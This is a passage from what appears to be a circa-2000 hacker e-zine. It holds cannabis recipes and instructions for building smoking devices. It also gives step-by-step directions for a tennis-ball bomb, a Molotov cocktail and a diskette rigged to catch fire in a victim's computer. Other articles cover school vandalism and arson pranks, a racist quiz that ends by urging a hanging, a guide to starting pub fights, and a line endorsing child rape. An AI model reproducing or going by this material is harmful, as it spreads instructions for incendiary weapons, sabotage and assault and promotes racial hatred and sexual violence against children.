1 large can pork and beans 1/2 cup marihuana 4 slices bacon 1/2 cup light molasses 1/2 teaspoon hickory salt 3 pineapple rings Mix together in a casserole, cover top with pineapple and bacon, bake at 350 degrees for about 45 minutes. Serves about six. The Meat Ball 1 lb. hamburger 1/4 cup chopped onions 1 can cream of mushroom soup 1/4 cup bread crumbs 3 tablespoons grass 3 tablespoons India relish Mix it up and shape into meatballs. Brown in frying pan and drain. Place in a casserole with soup and 1/2 cup water, cover and cook over low heat for about 30 minutes. Feeds about four people. Spaghetti Sauce 1 can tomato paste 2 tablespoons olive oil 1/2 cup chopped onions 1/2 cup chopped marihuana 1 pinch pepper 1 can water (6 oz) 1/2 clove minced garlic 1 bay leaf 1 pinch thyme 1/2 teaspoon salt Mix in a large pot, cover and shimmer with frequent stirring for two hours. Serve over spaghetti. Pot Loaf 1 packet onion soup mix 1 can whole peeled tomatoes (16 oz) 1/2 cup chopped marihuana 2 lbs. ground beef 1 egg 4 slices bread, crumbed Mix all ingredients and shape into a loaf. Bake for one hour in 400-degree oven. Serves about six. Chili Bean Pot 2 lbs. pinto beans 1 lb. bacon, cut into two-inch sections 2 cups red wine 4 tablespoons chili powder 1/2 clove garlic 1 cup chopped grass 1/2 cup mushrooms Soak beans overnight in water. In a large pot pour boiling water over beans and simmer for at least an hour, adding more water to keep beans covered. Now add all other ingredients and continue to simmer for another three hours. Salt to tast. Serves about ten. Apple Pot 4 apples (cored) 1/2 cup brown sugar 1/4 cup water 4 cherries 1/3 cup chopped grass 2 tablespoons cinamon Powder the grass in a blender, then mix grass with sugar and water. Stuff cores with this paste. Sprinkle apples with cinnamon, and top with a cherry. Bake for 25 minutes at 350 degrees. Pot Brownies 1/2 cup flour 3 tablespoons shortening 2 tablespoons honey 1 egg (beaten) 1 tablespoon water 1/2 cup grass pinch of salt 1/4 teaspoon baking powder 1/2 cup sugar 2 tablespoons corn syrup 1 square melted chocolate 1 teaspoon vanilla 1/2 cup chopped nuts Sift flour, baking powder, and salt together. Mix shortening, sugar, honey, syrup, and egg. Then blend in chocolate and other ingredients, mix well. Spread in an eight-inch pan and bake for 20 minutes at 350 degrees. Banana Bread 1/2 cup shortening 2 eggs 1 teaspoon lemon juice 3 teaspoons baking powder 1 cup sugar 1 cup mashed bananas 2 cups sifted flour 1/2 cup chopped marihuana 1/2 teaspoon salt 1 cup chopped nuts Mix the shortening and sugar, beat eggs, and add to mixture. Seperately mix bananas with lemon juice and add to the first mixture. Sift flour, salt, and baking powder together, then mix all ingredients together. Bake for 1 1/4 hours at 375 degrees. Sesame Seed Marihuana Cookies 3 oz ground roast sesame seeds 3 tablespoons ground almonds 1/4 teaspoon nutmeg 1/4 cup honey 1/2 teaspoon ground ginger 1/4 teaspoon cinnamon 1/4 oz grass Toast the grass until slightly brown and then crush it in a mortar. Mix crushed grass with all other ingredients, in a skillet. Place skillet over low flame and add 1 tablespoon of salt butter. Allow it to cook. When cool, roll mixture into little balls and dip them into the sesame seeds. If you happen to be at a place where pot is being grown, here's one of the greates recipes you can try. Pick a medium-sized leaf off the marihuana plant and dip it into a cup of drawn butter, add salt, and eat. _________________ THIS ARTIKLE WAZ RITEN BY WH0RDE AN HE IZ LEET SO U BBEST BE STEPING0R HE WILL OWNZ0R YOU YKNOW D00D HES A LEET POTH3D GUY SO LIKE FUCK OFF AN SHIZIT MAN HES ALL LEET AND SHIT LIKE... WHOA.. ITS TIME TO GIT HIGH@#%#% ----------------- b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [11:. - [ A fistful of bombs ] [d[a]wg] :. ] [h4x0r_d4wg@yahoo.com] :. ] ____________________________________________________________________ tennis ball bomb First off, you will need a tennis ball. New or old, it does not make a difference. Then cut the ball in half. Fill one half with fertilizer. Leave a little hole in the tennis ball so a fuse can be fitted into it. Now glue or tape the halves together. For a fuse you can use a strand of toilet paper. With the fuses, get creative. Dip them in gas to make them light faster, get different materials, whatever you like. Make sure the fuse is sticking out of the top by about three inches. You wouldn't want it to blow up in your hand. That may leave you with only a half of your face and one hand. Then, stick the fuse in the ball and light it. Then your ready to throw. The effect of these bombs is not devastating. It will only shoot flaming pieces of rubber at people. But just because these bombs can't take out buildings I suggest you are very careful what you do with them. molotov cocktail Molotov cocktails are a very effective way of getting rid of things. I am sure you have seen them before. They are frequently used in riots and other violent outbreaks. This bomb has been tested by doh and let me tell you, this is a must. What you need is a piece of a rag, a beer bottle, and some gasoline. Now take the bottle, and fill it with about two inches of gasoline. Now take the rag and stick it in the top of the bottle leaving half of the rag hanging out of the bottle. Then, put your hand over the top of the bottle securing the rag. The rag will get doused in gas. Then take the rag out and put the other/dry side of the rag in the bottle and douse that. You are now ready to go. Take a lighter/match and light the rag. It will go up very fast because of the gas (for all you jack asses that don't know gasoline is flammable). As soon as it is lit, throw it. The bottle will break and the gas will spill out and soon enough catch fire when the burning rag hits it. Once again, do not hold the bottle. Pressure will build up inside making a more powerful bomb and it will explode with a grenade's effect. The glass will shoot off like shrapnel and if it hits you, you're gonna get ripped up pretty bad. diskette bomb For this recipe your going to need a diskette and a few matches and of course a stupid victim, take the diskette and take the sliding silver piece off carefully without bending it much cause you are going to have to put it back on and make it look like its in perfect condition, then with your nail, a knife, or a envelope opener carefully separate the disk into two different pieces the top and the bottom. Next take a five matches and scrape all of the sulfur off into the inside of the disk. Next close up the disk and place the silver piece back onto the diskette. Make sure you close it up so it looks like it was never opened. Now when you give this to some idiot tell them to insert it into the floppy drive and when computer reads the disk it will spark and the sulfur will spark and flame. Bye, bye computer. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [12:. - [ Owning the universe ] [tak] :. ] [tak@b0g.org] :. ] ____________________________________________________________________ SCHOOLS COMING ~!@#$ get ready, cause your first day should own++ Bring pennies, alot of em, and krazy glue, and start gluing them everywhere, especially on lockers, and doorknobs. Get dish soap, and somehow[you figure it out] get it in the halls. ===]]] people will fall like Praes mom is jumping up and down. Now you gotta knock the people over, and shit. HAHA bitches. put ink, or something equally stainful on the seats, same color is good, then when they sit...HAHAHAH take a cup of something ICKY, put a piece of papaer over it, adn turn it upside down on the table, then pull the paper out from under it, when the janitor or student or someone picks it up, EEEEWWWWWW FUCK THEM! ok ok heh i got like 2 mins to write this shit, so im hurrying, im at my grandparents. Get a knife or scissors or shit, and make a hole in the tip of chalk, then krazy glue hte head of a strike anywhere match in there, and when they go to write, it catches flame...=D also a cool thing to do is put jello mix in the toilets, it hardens, and makes people wonder.... krazy glue in keyholes, and on locker combination knobs is always a must, along with writing on walls, it really pisses the faculty off when the shit goes down, and there is a mess to clean up. write tak owns you on the walls, and b0g.org under it =] then get your mafia friends to sync their watches, and at a single moment, everyone in diffrent parts of the school drop stink bombs, and make the place a living hell. bombs, and or match books are good in trash cans. When either are lit, paper towls, and shit light and its all fun =D you can use ciggarretes for a long fuse, and such. you can also print up some newpapers or some shit promoting weird and illegal shit. or keep it legit, and put hack/phreak stuff in there, stuff that confuses adults...they fear what they do not know, but they cant put it out, cause its legal. THE END. rape little girls too. hacking a computer in CompUSA. start: run: notepad open c:\autoexec.bat type: dir /s dir /s ETC... like 500000 times, then when it boots, they are like HOLY HACKER BATMAN! then start: run: pbrush open: c:\windows\logos.sys open: c:\windows\logow.sys open: c:\logo.sys change those to your liking...h0h0 change the wallpaper, and scrolling marquee screen saver. bust some moves on the IE title bar in the registry. Change some registry values to weird shit. OH, ANOTHER HACKER MOVE...c:\windows\something has a .ini file with the encrypted password for the screen saver, you cant decrypt it, but you can delete it.. =D Guide to tomb raider: When playing the game Tomb Raider 1/2/3 your main goal is to get that bitch into the water. Make sure shes wearing the tan pants, and the blue shirt...She is madly sexy in that. Now make your view right below her, and make her swin up, as she swims...her legs spread apart and together, and its so nice...uNF Then after you lost your load to a cartoon, throw your computer out your windows, and go get a girlfriend you little sick fuck. I should shoot you now for thinking that a game could turn you on, now i got a game to get back to... b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [13:. - [ Why RLoxley Is My Favorite Person On Earth] [acidkick] :. ] [acidkick@b0g.org] :. ] ____________________________________________________________________ Hello hax0rs. AcidKick here reporting live from the home of the famous haxt0r RLoxley. I am here to tell you about why RLoxley is my favorite person on earth. I am sure some of you are thinking "DOUBLE-U TEE EFF IZ TH1S B14TCH SM0K1NG!#$@", but I kid you not...RLoxley truly is my favorite person in the world, and in the b0g exclusive I'll tell you why. Reason Numero Uno: He is elite. No that isn't a misprint in b0g. RLoxley is elite. That mans eliteness cannot be surpassed by anyone else. I mean when I am masturbating and thinking of the word "elite"...RLoxley is what comes to mind. He defines elite in the best way, the haxt0r way. I am beginning to think that he may actually be Dade Murphy (aka z3r0c00l), but I'm not sure as he denies this. If that is the case, I take great pleasure in knowing that I have been kick/banned from #hackphreak by zerocool. That is the greatest feeling anyone can have, aside from hacking the gibson of course!@# This man is truly elite, and he's fat too. It's all right that he weighs a lot, because he's elite. There are fat people and there are cool fat people...RLoxley defines cool fat people. Reason Number Two: He coded hacktheplanet2000.exe THAT'S RIGHT I SAID IT!@$#% It has come to my attention that RLoxley himself is the person who coded hacktheplanet2000.exe. Now, this came as a great shock to me, I never thought that I, acidkick, would actually speak to the creator of this truly 3133(5+2) program. This may have been a secret, but here in b0g you the b0g reader is getting first hand 0d4y information. The hacktheplanet2000.exe programmer has been discovered...and his name is RLoxley. Reason Number Trois: He is Bill Gates. RLoxley is actually Bill Gates people. This may be hard to believe, but believe me because I'm right and if you don't listen to me you will be punished. He IS the one who coded Windows3.1 aka the OS of the future. I mean we all know that Windows3.1 will soon take over as everyone's OS of choice and this is a direct result of the hard work of RLoxley. If it wasn't for his mad technique nobody would be able to use Windows3.1 and the world would be lost. We all owe something to RLoxley for his great achievements in the realm of creating software monopolies. Reason Number Four: He can code in BASIC. No explination is really needed here. That is all I have for you today my friends, for the next issue I might actually write an article longer than a few hours before b0g is set to come out so I can spend more time on it and make it more l33t. Shouts to all of my brothers at b0g, #dps, #lactose, #hacktech and everyone that is cool. b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [14:. - [ How to tell if your best friend is a wigger ] [zeddy] :. ] [zeddy@zeddy.org] :. ] ____________________________________________________________________ You may have been buddies for years, but lately your friend has been acting differently lately. Could it be that your best friend is a wigger? Here's a simple test to see if your friend is a wigger. 1. Who is your friend's favorite music group/artist? A - Metallica B - Rage Against The Machine C - Insane Clown Posse D - Snoop Dogg 2. What type of clothing does your friend wear? A - Circa B - Sears C - Adidas D - big white sheet and a turban 3. What brand shoes does your friend wear? A - DC B - Airwalk C - Nike D - Fubu 4. What trait does your friend look for in a girl? A - big breasts B - good personality C - really easy D - big fat ass 5. What is the most annoying thing about them? A - they smell bad B - they're lazy C - they eat all the shit in your house D - they constantly drop letters off of words (eg. 'Sup) 6. How many black friends do they have? A - 0 B - 1-5 C - 6-10 D - you're seeing more black then a blind man 7. How much jewelry do they wear? A - none B - maybe a ring occasionally C - bracelet/necklace D - enough to make Mr. T look good 8. What body part do they have pierced? A - lip B - eyebrow C - nose D - ear 9. What is their mode of transportation? A - skateboard B - bike C - bus D - pink hydro-thumpin' pinto 10. What type of girls does he go out with? A - skate chicks B - gothic and heavily pierced C - cheerleader/prep D - Black, gossipy, very annoying little bitches that nobody likes and wish someone would come by and.... Anyway time to add it all up! For every: A - 10 points B - 5 points C - 2 points D - not a damn thing! If they scored: 80-100 - What the hell were you thinking? You can't get any whiter than this without wearing a big pointy hood! 60-80 - Nothing to really worry about. Force them to listen to several hours of hard metal and all worries should fade away 40-60 - Now it's getting bad. Go into their room, take every rap CD and snap them half. Or sell them as coasters, that's all they're good for. Then have a big fubu bonfire in their front yard. 20-40 - Yeah ok. Your friend is a wigger. Find a new best friend. 0-20 - Your friend couldn't get any blacker without painting his face. Get that pointy white hood, cause it's time for a hanging. Trust me. It's the only way to save him. This test brought to you by Zeddy. www.zeddy.org www.ph33nds.org b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [15:. - [ How to start a Pub Ruck ] [bruk0ut] :. ] [bruk0ut@b0g.org] :. ] ____________________________________________________________________ First things first... in order to get you motivated it is essential that you download http://www.b0g.org/ringland_barmyarmy.mp3 written by me with a fake accent h0h0. once you've listened to it a few times you should be pumpin for ruckuz. phone your mates wee john, andy, steve, and kev and meet down the local in 30 mins. This is where the tekneeq comes in, scan the pub for wankers/hard cunts. a typical wanker would be a nob wearing gay clothes and being loud as fuck. a hard bastard would be a hard bastard. walk over to the guy and barge into him spilling your pint on him. He should say "You fucking prick I�m soaking." then you reply with "oh aye?" at this point, the ruck is about to start, your mates should keep a good watch incase you start getting a doing and they can jump in, this could result in a full blown bar ruck where everyone has a dig and a mad ruck breaks out, (wicked) or just either you or the other guy gets a kick in and that�s that or you both get thrown out, ruck in anyway you think is feasible. A way to start a bar ruck is the following. you should take advantage of the local's in the pub. they will have grown a fond liking to the bar man. a) go to the bar and ask for a pint b) the bar man will pull it and ask for money c) take a drink and spit it out saying "THAT�S FUCKING RANK" d) scoop the bottom of the pint upwards towards the barman�s head resulting in a smash. At this point the locals will all come for you. MAD ruckuz ahead..... misc. ways to start a ruck 1. throw a stool over at a table where people are sitting and come flying in with a headbutt (the people at the table will be thinking "WTF(*^()^$"" 2. go to the toilet and if someone goes in a cubical for a dump or whatever, wet some toilet paper and throw it over the top trying to hit him, better yet, if there is a gap on the top of the cubicle pull your self up so u can see over it and fire a soggy paper b0mb down aiming for his face. he should come out pretty steamed, have a small one at the ready and throw sharply in his eyes, attack while he�s stunned 3. a simple and effective way is to try it on with someone�s girlfriend. when the guy notices, and comes over, lay into him. 4. being rowdy as fuck will result in you maybe getting thrown out by management, excellent. cos you can attempt to ruck the big fuck off bouncers. warning : may prove fatal. 5. the easiest way is, if you see a bloke with his bird, when she goes to the toilet or when she fucks off for whatever reason go up to the bloke and say "that your bird mate?" he will respond "yeah". then you say "ahh, cos I fucked that ugly SKANK LAST NIGHT " a ruck will break out in one way or another h0h0 that�s it.. I don�t condone mindless rucking. it ruins peoples night and is fucking stupid. there�s nothing better than a good ruck when there�s a good reason :P . I wrote this article/mp3 as a piss take. --Bruk0ut b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [16:. - [: Fun Cannabis Related Tools ] [trionix] :. ] [trionix@b0g.org] :. ] ____________________________________________________________________ Number 1:- The Shotgun (also called the Shottie) This is an absolute little bastard that will seriously mess u up, no joke, if done correctly, this is a bitch. Ok, tools u'll need: A plastic bottle, the bigger the better Water A metal tube that's about 8 cms long, and 1 cms wide (if u dun have 1, I'll explain how to make) Cannabis, either crumbled, leaves, or block, all are good Tobacco (don't worry, u won't be smoking it) A knife Instructions to make the tube: Right, to this part, you'll need a can of Stella, a knife and some tape. Cut either end off the (EMPTY) can of stella, leaving u with a fat tube. Cut down one side of this and flatten it out, it should be a square shape. Simply roll this piece of metal into a tube of the above specifications, and secure in place with tape. Instructions to make the Shotgun: Now, this is a proper shottie, not one of the shitty little things that people have no time or care to make. First, cut a hole large enough for the tube to fit snugly into, about 2 inches from the bottom of the bottle. now, take the tube, and pack it half way with tobacco, but leave about a centimetre at the top of that half free (see diagram) |xxxxxxxxxxxxxxxxxxxxxxxxxxxxx| |spacespacespace|tobacco|space| |xxxxxxxxxxxxxxxxxxxxxxxxxxxxx| now, take your pot, and place a desired amount in the space above the tobacco (the more the pot, the harder the hit). Get a friend to hold the tube. Take the bottle, and hold it on a slope and fill it part way with water, so that the water doesn't pour out of the hole. Take the pre- prepared tube and place through the hole, down, into the water, so that the half with no tobacco or pot is in the water, and the other half is pretty much outside of the bottle. Seal round the edges with blu-tac or something. What to Do: Holding the bottle at a slope, to avoid water spillage, put the top to your lips. Using a lighter, light the pot in the top of the tube, and suck GENTLY. The sucking should pull the flame down onto the pot, and the smoke from the burning pot will be pulled through the tobacco, bubbling through the water, and into the rest of the bottle. Wait until the smoke in here gets relatively thick (so thick u can't see through it). Stop sucking, put your hand over the end, and have a look at what's about to pour into your lungs! Put your mouth back to the top of the bottle, and suck HARD. The strong suction will suck the tobacco down, into the water, thus making the hole through which air can be pulled considerably larger. This will suck all of the smoke in the bottle straight into your lungs. Number 2:- The Bucket Ladies and Gentlemen, boys and girls, this is relatively simple to make, it does, however, take patience, and more than 1 person. The effects are, however, as I'm sure you'll agree, quite, quite devastating :)) Ok, tools u'll need: A bucket (duh) A plastic bottle A knife Tin foil A lighter The weed of your choice (although solids and skunk work best) Water What to do: Oh, the wonders of science :) Get yer bucket, and fill it with water. Leave it outside so it'll be nice and cold. Take the plastic bottle and cut off the bottom of it. Throw this part away, or use as an ashtray, up to you :) Take the tin foil, and place over the top bit of the bottle (what's that bit called? The bit the lid/cap goes on? Any comments to Trionix@hackuk.com). Get the knife, and pierce small holes in the tin foil (VERY SMALL), making sure that the holes stay VERY SMALL. Now, get your dope and lighter ready, and go outside. Place the bottle in the bucket, ensuring it fills completely with water. Put the dope in the tin foil (with the holes in it) that's over the neck (THAT'S IT) of the bottle. You'd better hope the holes were small. Get one of your mates to light the dope, whilst you SLOWLY pull the bottle out of the water. SLOWLY. Keep the dope lit, and if it all works properly, the suction of the water leaving the bottle to go back in the bucket should draw the smoke down, into the bottle. Keep lifting the bottle out of the water, taking care not to drop it (that's what happened on my first bucket, I actually could have cried). Once the bottle is almost totally out of the water, take off the tin foil, and place your hand over the top. This is the fun bit. Keeping some of the bottle underwater, put your mouth over the neck of it. Now, push your head STRAIGHT down towards the bucket. As the bottle goes underwater, the smoke inside it needs to go somewhere, and as your mouth is the only place it can go....BREATHE IN HARD!!! Very time-consuming, I know, but the water cools the smoke right down, u barely even feel it going in, but you'll know it did! Number 3:- The Lung Known by many to absolutely WRECK your mouth, throat and lungs, and make you cough like a bitch, the lung is one of the deadliest toys u can play with. No, really, this actually made me drink alcohol. Anyone who knows me KNOWS I don't EVER drink, but I needed to extinguish my throat. Give it a go though :) Ok, tools u'll need: A plastic bottle (suprise suprise) A plastic bag Tin foil A knife (suprise suprise) Cannabis (preferably solids) Sellotape Yet again, we need to cut the bottom off the bottle, do what u want with the bottom, but we won't be using it :) Now, take the plastic bag, and push it right inside the bottle, with the handles left outside. Move the bag about a bit, until it's pushed against the sides of the bottle, and u can like, put your hand inside it, while it's in the bottle. Now, leaving about 2 inches spare, cut the bag off, so that you've cut off the handles and the top of the bag. Throw away. Take the spare 2 inches of bag that should be hanging out of the tube, and fold them around the end of it. Tape these down VERY tightly, so no air can get in or out. Now, place the bottle to your lips and blow hard, and the bag should shoot out the end, full of air. This is your lung. A mate of mine actually managed to get his mum to help him make one, claiming that it was a science project. No joke, deadly seriously, she actually didn't realize. Push the bag back inside the tube. Take the tin foil, and place over the top of the bottle. Pierce VERY small holes in the foil, VERY SMALL HOLES. Place in the foil, that should be kind of in the neck of the bottle, the cannabis of your choice. Get a friend to light the pot, while you slowly pull the bag out of the bottle, VERY SLOWLY. This will draw the smoke down, into the bottle. Wait until you've pulled the bag all the way down, and remove the tin foil. Place the neck of the bottle in your mouth and SUCK HARD!! As you suck, the bag will be pulled back into the bottle, forcing the smoke into your lungs :) Number 4:- The Carrot Pipe This text will be a little shorter, as a carrot pipe is very quick and very easy to make. The juices from the carrot cool the smoke right down, u can barely even feel it go down! Ok, tools u'll need: A carrot (funnily enough) A knife, or something you can scoop the inside out with Cannabis, any is good (as always!) Tin foil Tape What to do: Simply take the carrot, and chop off the thin end. Now hollow out its inside, going from the thin end to about a centimeter away from the other end. Above where you finished this hole, dig down with another hole, to connect the two up. This is your pipe, however, like this it is no good. You now have to make a decision, joint or just pot? If you choose to use joints with your pipe, please see i) and if u choose to use just pot, please see ii). i) Joints. Right, at the moment, the inside of the carrot is MAD wet, and there's nothing more annoying than a wet butt on a joint, we've all been the victim of someone bumming a joint, and it's not a pleasant experience. To get rid of the wetness, simply hold the side hole u made over a naked flame, like a candle or a lighter, and wait for it to go black, inside and outside the hole. Now, blow HARD down the thin end of the pipe to get rid of all the carrot bits. Take your pre-rolled joint and place in the now completely dry hole. Suck hard on the thin end. The smoke is pulled down from the joint, through the carrot, cooled my the carrots juices, and goes straight into you! Please see iii) ii) Just pot. Hmm, the little more complicated one, but each to their own I guess. Take the tin foil and tear a square large enough to completely cover the hole in the side of the carrot. Tape down this foil around the edges of the hole. Now, using the knife, make VERY small holes in the tin foil, this acts as your gauz. Crumble into the foil whatever you wish to smoke, and put the thin end of the carrot in your mouth. Hold a flame over the cannabis, and suck HARD. The sucking will pull down the flame, lighting the herb, and sucking it down into you, having fortunately been cooled by the carrot's cooling goodness! Please see iii) iii) Remember the Golden Rule kids! DON'T COUGH!!! With a little experimentation, this little bitch can be very powerful, but you can't even feel the smoke go down. One of my favorites! Have fun y'hear? b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [17:. - [ Mailbag ] [k-rad-bob] :. ] [k-rad-bob@b0g.org] :. ] ____________________________________________________________________ Fra: k-rad-bob Til: jp@antionline.com Emne: greetings Dato: 29. august 2000 23:38 yo jp im so happy to see that you finally managed to get your mailbag up and running again. once again my mondays will seem just a tad less meaningless. im suprised nobody has commented on your sites "new" layout. personally i this its two steps back, but then again i know you did it just so you can make all the 0day leet lynx hax0rs lifes hell by refusing them to browse your site. next, mr kevin, let his name rest... i think we're all sick and tired of hearing about him day in and day out. its getting like the whole clinton/monica deal, but without the sexy cigars. now all you need to do in order to get the leetest security related site on the net is to provide a tiny link on the main page each time we at http://www.b0g.org release a new issue of our totally free non-profit online security magazine. well atleast you can add it to the eye on the underground section. yours in cyberspace k-rad-bob founder of www.b0g.org Fra: Tim Grape Til: k-rad-bob@b0g.org Emne: Really funny IRC log to add to b0g 8 Dato: 03. august 2000 14:17 im gay HAHAHAHAHAHAHAH THE BOT TALKED ! ok.. so it was on my winircd but still thats hacker-like.exe come to my IRCD PLZ! C:\> cd hackingtools C:\hackingtools\> iplookup.exe IP Lookup for Windows v0.8 - Finds IP of a hostname. You did not specify a hostname! Your IP is: That my IP so plz come just dont run buffer flows pls --THANKZ BYe > From: "Matt Clark" > To: > Cc: > Subject: Legal matter > Date: Sat, 29 Jul 2000 14:31:30 -0500 > X-Mailer: Microsoft Outlook Express 5.00.2314.1300 > > From the Official Desk of Matthew Clark > Chicago, IL 60093 > > Dear Sir or Miss: > > It has come to my attention that you have banned the members of the most > popular and 'guberleet' (as defined by UPWLK) channel on this 'IRC Server' > Undernet, from using official IRC Services. The channel, the party of the > first part, #k-rad, is disturbed by this action, and wish to form a legal > alliance to combat your actions. Some of the members have legal precedence > in the government community, being members of "b0g," a security magazine > that has ties to Packetstorm, Securify, the UPSS, and DSN Security Agency. > If you remove this 'blacklist' entry then I'm sure they would drop > allegations, but a few members specifically are seeking legal retribution. > Please respond ASAP so matters can be worked out. > > Sincerely, Matthew C Clark > Attorney of DSN Security Agency > > > > ----- Original Message ----- From: Angel To: "Matt Clark" Sent: Tuesday, August 15, 2000 7:08 PM Subject: RE: Legal matter > Mr Clark, > > I am the North American Abuse Coordinator for the Undernet.org IRC Network. > Due to the nature of your below included missive to one of our IRC > operators, your post has been forwarded to me for further processing and > attention at this time. > > At this time, I would ask that you present your State Bar License # and the > State or States in which you are admitted to practice in. > > Until the above requested information has been provided, no correspondence > will be further entered into. > > Best regards, > > Angel Moss > North American Abuse Coordinator > Undernet.org IRC Network > From: Matt Clark To: Angel Cc: Subject: Re: Legal matter Date: 18 August 2000 10:19 >From the Official Desk of Matthew Clark Chicago, IL 60093 Dear "Angel," if that is your REAL name, my bar number is 6969696969696969696969696969 and I can practice wherever the hell I please. If you do not send me three hundred dollars I will be forced to dance around with my underpants proudly displayed on my head. That will be all for now. Sincerely, Matthew C Clark Attorney of DSN Security Agency From: Must Have Been A Wild Angel To: xantium Cc: Sent: Tuesday, August 22, 2000 4:33 AM Subject: Re: [Abuse] oper abuse (darkraven) > Greetings, > > An individual by the name of Matt Clark presented himself to this network > as an attorney representing a group of users of #k-rad threatening legal > action against either the Undernet.org IRC Network or some of it's > volunteer operators. > > Mr. Clark was put on notice that until such a time as a formal complaint > has been filed, served and settled that he, and the members of #k-rad are > formally uninvited from connecting to or using any Undernet.org IRC > Network resource. > > Mr. Clark has been asked to present his Bar Assoc. License # and which > state(s) he has been admitted into pratice and was also put on notice that > faliure to provide the requested information would result in a complaint > being filed with the Attorney General of the State of Ill. against him. > > I suggest you take the information in the ban to heart, and find a new IRC > network, at least until this matter has been settled to satisfaction. > > Regards, > > Angel Moss > North American Abuse Coordinator, Undernet.org > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =- =-= > Angel111@undernet.org IRC Admin LasVegas.NV.US.Undernet.org > North American Abuse Coordinator, Undernet.org IRC Network > Cell & Voice Mail: (803) 417-2067 > ------------------------------------------------------------------------- - ---- > Grant me the ability to give Emergency Care. With skillfull hands, and > knowledgeable mind, and tender love and care. Help me deal with > everything, when lives are on the line. To see the worst, administer aid, > and ease a worried mind. So help me as I go today, accept what fate may > be. Touch these hands, use this mind, help this EMT...Amen > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =- =-= 